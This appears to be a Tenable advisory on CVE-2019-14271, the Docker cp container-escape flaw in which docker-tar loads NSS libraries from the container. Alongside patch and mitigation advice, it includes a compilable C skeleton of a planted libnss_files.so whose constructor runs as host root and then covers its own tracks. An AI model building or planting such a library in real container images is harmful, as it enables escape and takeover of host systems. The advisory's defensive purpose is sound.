CVE-2019-14271: Proof of Concept for Docker Copy (docker cp) Vulnerability Released
Proof-of-concept (PoC) code for a security flaw in Docker, the popular containerization platform, is now public.
Background
On November 19, researchers at Unit 42, Palo Alto Networks’ research team, published their analysis of a severe vulnerability in the popular container deployment platform, Docker.
Analysis
CVE-2019-14271 is a critical code injection flaw in the Docker copy (docker cp) command, which is used to copy files between a container and the local filesystem. Successful exploitation of this flaw can lead to a full container escape. It is important to note that to exploit this vulnerability, an attacker would need to include the exploit code in a malicious Docker container image, or compromise a running container either via another vulnerability or using previously leaked Docker secrets.
While the vulnerability was patched back in July 2019, researchers from Unit 42 published their analysis of the flaw on November 19. According to these researchers, the vulnerability exists in docker cp because a helper process (docker-tar) improperly loads specific libraries from the container file system rather than from the host file system. Specifically, docker-tar loads the Name Service Switch (NSS) libraries, identified by their filenames beginning with libnss. docker-tar runs as root on the host and is not confined by the container's namespaces; it only chroot()s into the container's root filesystem, which is why a library it loads from there runs with full root access to the host.
To demonstrate exploitation of CVE-2019-14271, the researchers created their own version of an NSS library (libnss_files.so) and added a function called run_at_link(). The function first checks that it has been invoked by docker-tar, then replaces the malicious libnss_files.so with the legitimate one, because it is only intended to run once. Finally, it executes a script that mounts the host filesystem on the container at the /host_fs path and writes a message to a specified path (/evil) on the host. A video demonstration of this exploit can be found in the Palo Alto Networks blog.
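The following C skeleton is an added illustration of the planted-NSS-library mechanism described above; it is not the Unit 42 proof of concept and not Docker code. It assumes Debian-style library paths (PLANTED_LIB, ORIGINAL_LIB), identifies docker-tar by the argv[0] that Docker's re-exec sets on the helper (the real PoC's check may differ), and replaces the host-mount payload with a marker file. The real PoC patched glibc's own libnss_files source so that name lookups kept working; this stub exports no NSS symbols, so the lookup that triggers it will fail.

```c
/* Added illustration of the libnss hijack mechanism (NOT the Unit 42 PoC).
 * Build as a shared object: gcc -shared -fPIC -o libnss_files.so.2 nss_hijack.c
 * All paths and the marker-file payload below are assumptions for the demo. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

/* Assumed locations: where the container image ships the planted library, and
 * where the genuine copy was stashed so it can be restored after one run. */
#define PLANTED_LIB  "/lib/x86_64-linux-gnu/libnss_files.so.2"
#define ORIGINAL_LIB "/lib/x86_64-linux-gnu/libnss_files.so.2.orig"
#define MARKER_PATH  "/evil"   /* stand-in for the PoC's host-mount payload */

/* Decide whether the loading process is Docker's docker-tar helper.
 * docker-tar is the Docker daemon re-executed with argv[0] set to "docker-tar",
 * so the gate looks at the basename of argv[0]; /proc/self/exe would name the
 * daemon binary instead. Kept as a pure function so it can be unit-tested. */
int is_docker_tar(const char *argv0) {
    if (argv0 == NULL) return 0;
    const char *base = strrchr(argv0, '/');
    base = base ? base + 1 : argv0;
    return strcmp(base, "docker-tar") == 0;
}

/* Read argv[0] of the current process from /proc/self/cmdline, which stores
 * the arguments NUL-separated, so the buffer ends up holding just argv[0]. */
static int read_argv0(char *buf, size_t len) {
    int fd = open("/proc/self/cmdline", O_RDONLY);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, len - 1);
    close(fd);
    if (n <= 0) return -1;
    buf[n] = '\0';
    return 0;
}

/* Runs automatically when glibc's NSS dlopen()s this library (for example
 * during a getpwnam()/getgrnam() lookup). Because docker-tar has chroot()ed
 * into the container rootfs, the copy it loads is the container's copy. */
__attribute__((constructor))
static void run_at_link(void) {
    char argv0[256];
    if (read_argv0(argv0, sizeof argv0) != 0 || !is_docker_tar(argv0))
        return;                 /* loaded by some other process: stay silent */

    /* One-shot: put the genuine library back so later lookups behave normally.
     * The renamed-over file stays mapped in this process, so this is safe. */
    rename(ORIGINAL_LIB, PLANTED_LIB);

    /* Payload. docker-tar runs as host root outside the container's namespaces
     * (only chroot()ed), so code here has host privileges. The real PoC mounts
     * the host filesystem at /host_fs at this point; the demo only drops a
     * marker file at an assumed path. */
    int fd = open(MARKER_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd >= 0) {
        static const char msg[] = "run_at_link executed inside docker-tar\n";
        write(fd, msg, sizeof msg - 1);
        close(fd);
    }
}
```

The constructor is the whole trick: nothing in the library has to be called explicitly, because the dynamic loader runs it the moment NSS dlopen()s the file, and the argv[0] gate keeps it from firing when an ordinary process inside the container does a name lookup.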
Proof of Concept
In their blog, Unit 42 researchers included a PoC in the form of a malicious NSS library file, libnss_files.so.
Solution
As mentioned previously, Docker patched this vulnerability back in July in Docker version 19.03.1. Docker users are encouraged to update as soon as possible.
If updating to a patched version is not feasible at this time, users are strongly encouraged to only use trusted Docker container images that have been verified and/or signed. Additionally, please consider using non-root users when launching containers: a non-root process that is compromised at runtime cannot overwrite the container's system libraries, which mitigates the threat this vulnerability poses. Note that this does not help against a malicious image that ships the tampered libnss library already in place, so image verification remains the primary mitigation.
Identifying affected systems
A list of Tenable plugins to identify this vulnerability can be found here.
Get more information
- Palo Alto Networks blog on CVE-2019-14271
- Release Notes from Docker for version 19.03.1
- Debian Security Tracker for CVE-2019-14271
- SUSE Advisory for CVE-2019-14271
Join Tenable's Security Response Team on the Tenable Community.
Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.
Get a free 60-day trial of Tenable.io Vulnerability Management.
Related articles
- Container security
- Vulnerability Management